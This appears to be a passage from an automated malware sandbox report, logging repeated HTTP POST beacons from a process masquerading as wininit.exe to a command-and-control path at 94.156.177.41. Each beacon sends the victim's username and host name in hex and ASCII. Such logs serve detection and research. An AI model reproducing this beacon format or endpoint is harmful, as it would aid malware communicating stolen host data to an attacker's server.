                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:40.609402895 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:41.391279936 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:41 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    88192.168.2.224925194.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:41.544437885 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:41.549340010 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:42.303117990 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:42 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    89192.168.2.224925294.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:42.604454041 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:42.611715078 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:43.481375933 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:43 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    90192.168.2.224925394.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:43.628057003 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:43.638685942 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:44.496330976 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:44 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    91192.168.2.224925494.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:44.667074919 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:44.672058105 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:45.552701950 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:45 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    92192.168.2.224925594.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:45.972708941 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:45.977790117 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:46.836325884 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:46 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    93192.168.2.224925694.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:47.071502924 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:47.076412916 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:47.805121899 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:47 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    94192.168.2.224925794.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:48.079220057 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:48.084264040 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:48.830760956 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:48 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    95192.168.2.224925894.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:48.971710920 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:48.976619959 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:49.845029116 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:49 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    96192.168.2.224925994.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:49.985842943 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:49.991080999 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:50.739392042 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:50 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    97192.168.2.224926094.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:50.888453960 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:50.896157980 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:51.764324903 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:51 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    98192.168.2.224926194.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:51.901511908 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:51.906529903 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:52.644270897 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:52 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    99192.168.2.224926294.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:53.839478970 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:53.992288113 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:54.860554934 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:54 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    100192.168.2.224926394.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:55.232420921 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:55.237642050 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:56.162249088 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:55 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    101192.168.2.224926494.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:56.303037882 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:56.312045097 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:57.284970045 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:56 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    102192.168.2.224926594.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:57.425153971 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:57.430145979 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:58.170331001 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:58 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    103192.168.2.224926694.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:58.392790079 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:58.398091078 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:09:59.122375011 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:09:59 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    104192.168.2.224926794.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:09:59.657531977 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:09:59.662600994 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:10:00.411623955 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:10:00 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    105192.168.2.224926894.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:10:00.560472012 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:10:00.565537930 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:10:01.322582960 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:10:01 GMT
                                                    Content-Type: text/html; charset=utf-8
                                                    Connection: close
                                                    X-Powered-By: PHP/5.4.16
                                                    Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e
                                                    Data Ascii: File not found.


                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    106192.168.2.224926994.156.177.41803932C:\Users\user\AppData\Roaming\wininit.exe
                                                    TimestampBytes transferredDirectionData
                                                    Nov 20, 2024 11:10:01.467992067 CET244OUTPOST /maxzi/five/fre.php HTTP/1.0
                                                    User-Agent: Mozilla/4.08 (Charon; Inferno)
                                                    Host: 94.156.177.41
                                                    Accept: */*
                                                    Content-Type: application/octet-stream
                                                    Content-Encoding: binary
                                                    Content-Key: 9D963662
                                                    Content-Length: 149
                                                    Connection: close
                                                    Nov 20, 2024 11:10:01.472851038 CET149OUTData Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 41 00 6c 00 62 00 75 00 73 00 01 00 0c 00 00 00 34 00 36 00 38 00 33 00 32 00 35 00 01 00 10 00 00 00 41 00 4c 00 42 00 55 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01
                                                    Data Ascii: (ckav.ruAlbus468325ALBUS-PC0DE4229FCF97F5879F50F8FD3
                                                    Nov 20, 2024 11:10:02.202414036 CET193INHTTP/1.1 404 Not Found
                                                    Server: nginx/1.26.1
                                                    Date: Wed, 20 Nov 2024 10:10:02 GMT
                                                    Content-Type: text/html; charset=utf-8
